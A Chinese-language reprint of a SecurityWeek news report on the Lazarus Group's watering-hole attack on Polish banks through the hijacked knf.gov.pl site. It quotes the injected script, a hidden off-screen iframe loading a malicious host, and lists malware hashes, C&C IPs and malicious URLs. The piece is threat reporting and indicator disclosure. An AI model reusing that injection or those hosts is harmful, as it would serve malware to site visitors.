安全研究

业界动态
RSA 2017在开 拉撒路组织也正在攻击全球金融组织 据称31个国家100多组织已经遭到入侵
       随着对波兰银行的攻击的深入分析,一个针对针对全世界金融组织的宏伟计划似乎正在付出水面。研究人员已发现一些蛛丝马迹,指向一个名为拉撒路的威胁源起方。   

      本月早些时候BadCyber报道称,多个波兰银行的系统已经感染了一种新的恶意软件。攻击者劫持了波兰金融监管局网站(knf.gov.pl),并利用它向访客提供恶意软件。

 

恶意软件样本特征   

To unauthorised code was located in the following file:   

     http://www.knf.gov.pl/DefaultDesign/Layouts/KNF2013/resources/accordian-src.js?ver=11    

    and looked like that:   

     document.write("

rame name='forma' src='https://sap.misapor .ch/vishop/view.jsp?pagenum=1' width='145px' height='146px' style='left:-2144px;position:absolute;top :0px;'>rame>
");    


       攻击者试图利用此漏洞,向受害者的电脑下载恶意软件,一旦恶意软件被执行,就会连接到一些国外的服务器,可以用于执行网络侦察和数据泄露等目的。目前在某些情况下,攻击者曾试图获得银行基础设施的关键服务器的控制权。   

MD5 SHA1 SHA256 hashes of some samples:    

     C1364BBF63B3617B25B58209E4529D8C 85D316590EDFB4212049C4490DB08C4B 1BFBC0C9E0D9CEB5C3F4F6CED6BCFEAE 496207DB444203A6A9C02A32AFF28D563999736C 4F0D7A33D23D53C0EB8B34D102CDD660FC5323A2 BEDCEAFA2109139C793CB158CEC9FA48F980FF2B FC8607C155617E09D540C5030EABAD9A9512F656F16B38682FD50B2007583E9B D4616F9706403A0D5A2F9A8726230A4693E4C95C58DF5C753CCC684F1D3542E2 CC6A731E9DAFF84BAE4214603E1C3BAD8D6735B0CBB2A0EC1635B36E6A38CB3A    

     Some C&C IP addresses:    

     125.214.195.17 196.29.166.218    

     Potentially malicious URLs included in knf.gov.pl website:    

     http://sap.misapor.ch/vishop/view.jsp?pagenum=1 https://www.eye-watch.in/design/fancybox/Pnf.action    

 

      赛门铁克称攻击者攻击了31个国家的100多个组织   

       赛门铁克已经确定了大约150个被针对的IP地址,这些IP地址与31个国家的100多个组织有关联。被针对的组织多数为银行,但也包括电信和互联网公司。这些IP地址与波兰、美国、墨西哥、巴西、智利、丹麦、委内瑞拉、哥伦比亚、英国、秘鲁和印度等地的银行有关联。   

 

      BAE称攻击者利用波兰网站进行水坑式攻击   

      BAE系统公司发现,在最近的波兰水坑式攻击中所用的其中一个域,在针对墨西哥国家银行证券委员会(cnbv.gob.mx,相当于波兰的金融监管局)的攻击中也有涉及。BAE系统公司还发现了证据,表明乌拉圭的一家国有银行网站曾遭到类似攻击。BAE系统公司的研究人员在博文中表示,“将“拉撒路组织”(我们认为“拉撒路组织”是孟加拉银行攻击和2016年很多其他攻击的幕后黑手)指向水坑式攻击的技术,法医证据目前尚不清晰。   

 

      然而,银行主管国有银行网站可能会有倾向性的选择。与之前的中央银行抢劫攻击相比,它在渗透更广泛的银行业方面并无太大作用。”    2016年10月,自定义开发工具包被用来攻击赛门铁克在波兰、墨西哥和乌拉圭的客户。波兰网站被用作交付恶意软件(该恶意软件是“拉撒路组织”工具包的一部分)的水坑。   

 

      什么是水坑式攻击   

    “水坑式攻击”,是指黑客通过分析被攻击者的网络活动规律,寻找被攻击者经常访问的网站的弱点,先攻下该网站并植入攻击代码,等待被攻击者来访时实施攻击。这种攻击行为类似《动物世界》纪录片中的一种情节:捕食者埋伏在水里或者水坑周围,等其他动物前来喝水时发起攻击猎取食物。水坑攻击已经成为APT攻击的一种常用手段。

   

       据称拉撒路组织一个网络间谍组织   

       去年多家安全公司分析了“拉撒路组织” (Lazarus Group),至少2009年以后它一直很活跃,最早可能源于2007年。它不仅进行网络间谍活动,还发动旨在破坏数据和中断系统的攻击。   

 

    “拉撒路组织”已发起了多次高调攻击,包括2014年针对索尼公司的攻击,以及Dark Seoul和特洛伊行动。攻击者主要针对的位于韩国和美国的政府、军事、媒体、航空航天、金融和制造机构。   

 

       研究人员还发现,针对菲律宾一家银行的攻击和从孟加拉中央银行盗窃8100万美元的行动是同一个网络犯罪团伙所为。   

 

本文由:securityWeek 发布,版权归属于原作者。                        
如果转载,请注明出处及本文链接:                        
http://toutiao.secjia.com/unknown-malicious-software-attacks-polish-bank
如果此文章侵权,请留言,我们进行删除。


浏览次数:

关 闭